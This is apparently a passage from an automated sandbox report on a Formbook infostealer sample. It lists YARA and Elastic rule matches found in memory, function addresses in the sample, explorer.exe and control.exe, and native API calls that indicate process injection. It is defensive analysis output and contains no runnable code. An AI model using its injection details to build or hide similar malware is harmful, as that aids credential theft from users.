          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FFB16B3_2_00FFB16B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6516C3_2_00F6516C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD12ED3_2_00FD12ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4B2C03_2_00F4B2C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F352A03_2_00F352A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F7739A3_2_00F7739A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1D34C3_2_00F1D34C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE132D3_2_00FE132D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F214603_2_00F21460
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEF43F3_2_00FEF43F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCD5B03_2_00FCD5B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE75713_2_00FE7571
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE16CC3_2_00FE16CC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEF7B03_2_00FEF7B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F338E03_2_00F338E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9D8003_2_00F9D800
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F399503_2_00F39950
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4B9503_2_00F4B950
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FDDAC63_2_00FDDAC6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCDAAC3_2_00FCDAAC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F75AA03_2_00F75AA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA3A6C3_2_00FA3A6C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFA493_2_00FEFA49
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE7A463_2_00FE7A46
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA5BF03_2_00FA5BF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6DBF93_2_00F6DBF9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4FB803_2_00F4FB80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFB763_2_00FEFB76
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFCF23_2_00FEFCF2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA9C323_2_00FA9C32
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4FDC03_2_00F4FDC0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE7D733_2_00FE7D73
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE1D5A3_2_00FE1D5A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F33D403_2_00F33D40
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F39EB03_2_00F39EB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFFB13_2_00FEFFB1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F31F923_2_00F31F92
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFF093_2_00FEFF09
          Source: C:\Windows\explorer.exeCode function: 4_2_0E6092324_2_0E609232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E603B304_2_0E603B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0E603B324_2_0E603B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0E6080364_2_0E608036
          Source: C:\Windows\explorer.exeCode function: 4_2_0E5FF0824_2_0E5FF082
          Source: C:\Windows\explorer.exeCode function: 4_2_0E600D024_2_0E600D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0E6069124_2_0E606912
          Source: C:\Windows\explorer.exeCode function: 4_2_0E60C5CD4_2_0E60C5CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74D2324_2_0E74D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74C0364_2_0E74C036
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7430824_2_0E743082
          Source: C:\Windows\explorer.exeCode function: 4_2_0E747B304_2_0E747B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0E747B324_2_0E747B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74A9124_2_0E74A912
          Source: C:\Windows\explorer.exeCode function: 4_2_0E744D024_2_0E744D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7505CD4_2_0E7505CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E0E4F65_2_04E0E4F6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E124465_2_04E12446
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D514605_2_04D51460
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1F43F5_2_04E1F43F
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DFD5B05_2_04DFD5B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E205915_2_04E20591
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E175715_2_04E17571
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D605355_2_04D60535
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E116CC5_2_04E116CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7C6E05_2_04D7C6E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D5C7C05_2_04D5C7C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1F7B05_2_04E1F7B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D847505_2_04D84750
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D607705_2_04D60770
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1F0E05_2_04E1F0E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E170E95_2_04E170E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D670C05_2_04D670C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E0F0CC5_2_04E0F0CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E181CC5_2_04E181CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E201AA5_2_04E201AA
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6B1B05_2_04D6B1B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DE81585_2_04DE8158
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E2B16B5_2_04E2B16B
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D4F1725_2_04D4F172
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D9516C5_2_04D9516C
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DFA1185_2_04DFA118
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D501005_2_04D50100
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E012ED5_2_04E012ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7B2C05_2_04D7B2C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D652A05_2_04D652A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E002745_2_04E00274
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E203E65_2_04E203E6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6E3F05_2_04D6E3F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DA739A5_2_04DA739A
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D4D34C5_2_04D4D34C
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1A3525_2_04E1A352
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1132D5_2_04E1132D
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FCF25_2_04E1FCF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D50CF25_2_04D50CF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E00CB55_2_04E00CB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D60C005_2_04D60C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD9C325_2_04DD9C32
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7FDC05_2_04D7FDC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D5ADE05_2_04D5ADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D78DBF5_2_04D78DBF
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E17D735_2_04E17D73
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D63D405_2_04D63D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E11D5A5_2_04E11D5A
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6AD005_2_04D6AD00
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1EEDB5_2_04E1EEDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D72E905_2_04D72E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D69EB05_2_04D69EB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1CE935_2_04E1CE93
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D60E595_2_04D60E59
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1EE265_2_04E1EE26
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D52FC85_2_04D52FC8
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6CFE05_2_04D6CFE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D61F925_2_04D61F92
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FFB15_2_04E1FFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD4F405_2_04DD4F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FF095_2_04E1FF09
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D80F305_2_04D80F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DA2F285_2_04DA2F28
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D8E8F05_2_04D8E8F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D638E05_2_04D638E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D468B85_2_04D468B8
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D628405_2_04D62840
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6A8405_2_04D6A840
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DCD8005_2_04DCD800
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E2A9A65_2_04E2A9A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D629A05_2_04D629A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D699505_2_04D69950
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7B9505_2_04D7B950
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D769625_2_04D76962
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E0DAC65_2_04E0DAC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D5EA805_2_04D5EA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DFDAAC5_2_04DFDAAC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DA5AA05_2_04DA5AA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E17A465_2_04E17A46
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FA495_2_04E1FA49
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD3A6C5_2_04DD3A6C
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D9DBF95_2_04D9DBF9
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD5BF05_2_04DD5BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E16BD75_2_04E16BD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7FB805_2_04D7FB80
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FB765_2_04E1FB76
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1AB405_2_04E1AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8D5A65_2_02A8D5A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8E5155_2_02A8E515
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A79E605_2_02A79E60
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A72FB05_2_02A72FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A72D905_2_02A72D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8DD905_2_02A8DD90
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8DD025_2_02A8DD02
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DCEA12 appears 86 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DDF290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D95130 appears 36 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DA7E54 appears 96 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D4B970 appears 268 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F65130 appears 40 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00FAF290 appears 105 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F77E54 appears 99 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F1B970 appears 274 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F9EA12 appears 86 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041A360 NtCreateFile
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041A410 NtReadFile
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041A490 NtClose
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041A540 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041A3B3 NtCreateFile, NtReadFile
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041A40D NtReadFile
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_0041A53B NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62B60 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62D30 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62E80 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62FB0 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62F90 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F64340 NtSetContextThread
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F64650 NtSuspendThread
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62AF0 NtWriteFile
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62AB0 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62BE0 NtQueryValueKey
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62BA0 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62B80 NtQueryInformationFile
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62CF0 NtOpenProcess
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62CC0 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62C60 NtCreateKey
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62C00 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62DB0 NtEnumerateKey
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62D00 NtSetInformationFile
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62EE0 NtQueueApcThread
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62E30 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62FA0 NtQuerySection
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F62F60 NtCreateProcessEx
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F63090 NtSetValueKey
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F63010 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F635C0 NtCreateMutant
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F639B0 NtGetContextThread
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F63D70 NtOpenThread
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exe, Code function: 3_2_00F63D10 NtOpenProcessToken
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E74D232 NtCreateFile
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E74EE12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe, Code function: 4_2_0E74EE0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D935C0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe, Code function: 5_2_04D92C70 NtFreeVirtualMemory, LdrInitializeThunk
